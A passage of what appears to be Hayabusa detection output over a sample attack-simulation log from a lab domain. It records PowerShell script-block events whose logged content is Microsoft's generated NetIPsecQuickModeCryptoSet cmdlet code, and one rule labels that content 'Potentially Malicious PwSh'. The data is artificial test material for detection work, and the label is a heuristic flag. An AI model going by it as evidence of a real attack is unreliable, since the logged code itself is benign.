($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 